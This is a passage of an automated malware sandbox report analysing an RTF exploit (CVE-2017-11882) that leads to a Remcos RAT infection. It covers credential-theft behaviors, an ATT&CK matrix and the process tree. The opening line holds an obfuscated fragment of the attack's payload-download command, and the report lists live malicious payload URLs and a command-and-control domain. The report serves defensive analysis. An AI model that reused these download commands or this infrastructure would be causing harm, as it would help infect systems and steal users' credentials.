('txt.gffrew/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                  Source: RegAsm.exe, 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00434CB6 cpuid 8_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 8_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 8_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 8_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 8_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 8_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 8_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA, 8_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,GetLocaleInfoW, 8_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 8_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004489D7 GetSystemTimeAsFileTime, 8_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041B69E GetComputerNameExW,GetUserNameW, 8_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041739B GetVersionExW, 11_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword12_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3184, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
                  Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 8_2_0040569A
                  MITRE ATT&CK Matrix, listed per tactic (the number in parentheses is the count badge attached to that technique in the matrix; techniques without a number carry no badge):

                  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                  • Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                  • Execution: Native API (11); Exploitation for Client Execution (43); Command and Scripting Interpreter (123); Service Execution (2); PowerShell (3); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                  • Persistence: Scripting (111); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  • Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (422); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  • Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Install Root Certificate (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (422); Stripped Payloads
                  • Credential Access: OS Credential Dumping (2); Input Capture (111); Credentials in Registry (2); Credentials In Files (3); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                  • Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (38); Security Software Discovery (3); Virtualization/Sandbox Evasion (21); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
                  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                  • Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (2); Input Capture (111); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                  • Command and Control: Ingress Tool Transfer (13); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Proxy (1); Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                  • Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1505518 | Sample: SecuriteInfo.com.Exploit.CV... | Startdate: 06/09/2024 | Architecture: WINDOWS | Score: 100
                  Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 22 other signatures

                  • WINWORD.EXE (291 13) started
                    • EQNEDT32.EXE (12) started; a second EQNEDT32.EXE started
                      DNS/IP: 85.239.241.184, ports 49161, 49163, 80 (CASABLANCA-AS Internet Collocation Provider CZ, Czech Republic)
                      Created file: C:\Users\...\escreenthepicturewithbutters.vBS, Unicode (dropped)
                      Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                      • wscript.exe (1) started
                        Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
                        • powershell.exe (4) started
                          Signatures: Suspicious powershell command line found; Suspicious execution chain found
                          • powershell.exe (12 5) started
                            DNS/IP: archive.org 207.241.224.2, ports 443, 49162 (INTERNET-ARCHIVE US, United States)
                            Signatures: Installs new ROOT certificates; Found Tor onion address; Writes to foreign memory regions; Injects a PE file into a foreign processes
                            • RegAsm.exe (3 10) started
                              DNS/IP: dremom2.duckdns.org; dremom2.duckdns.org 45.89.247.65, ports 2201, 49164, 49165 (CMCSUS, United Kingdom); geoplugin.net 178.237.33.50, ports 49166, 80 (ATOM86-AS ATOM86 NL, Netherlands)
                              Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file / registry access); 6 other signatures; Uses dynamic DNS services (dremom2.duckdns.org)
                              • RegAsm.exe (1) started: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
                              • RegAsm.exe (1) started: Tries to harvest and steal browser information (history, passwords, etc)
                              • RegAsm.exe (11) started
                              • RegAsm.exe started

                  Source | Detection | Scanner | Label
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | 53% | Virustotal |
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | 100% | Avira | HEUR/Rtf.Malformed
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner
                  dremom2.duckdns.org | 1% | Virustotal
                  archive.org | 0% | Virustotal
                  geoplugin.net | 1% | Virustotal
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  dremom2.duckdns.org | 45.89.247.65 | true | true | | unknown
                  archive.org | 207.241.224.2 | true | true | | unknown
                  geoplugin.net | 178.237.33.50 | true | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF | true | 2% Virustotal; Avira URL Cloud: safe | unknown
                  http://85.239.241.184/35/WERFFG.txt | true | 2% Virustotal; Avira URL Cloud: safe | unknown
                  https://archive.org/download/new_image_vbs/new_image_vbs.jpg | true | 0% Virustotal; Avira URL Cloud: safe | unknown
                  dremom2.duckdns.org | true | 1% Virustotal; Avira URL Cloud: malware | unknown
                  http://geoplugin.net/json.gp | false | 8% Virustotal; Avira URL Cloud: safe | unknown
                  unknown
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFceEQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://o.aolcdn.com/ads/adswrappermsni.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.msn.com/?ocid=iehpbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://static.chartbeat.com/js/chartbeat.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.msn.com/de-de/?ocid=iehpbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://login.yahoo.com/config/loginRegAsm.exefalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net0RegAsm.exe, 0000000B.00000002.380657934.0000000000374000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net/RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.369133356.0000000002461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.0000000002461000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/server1.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://archive.org/download/new_image_vbs/new_imaLRpowershell.exe, 00000005.00000002.369133356.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
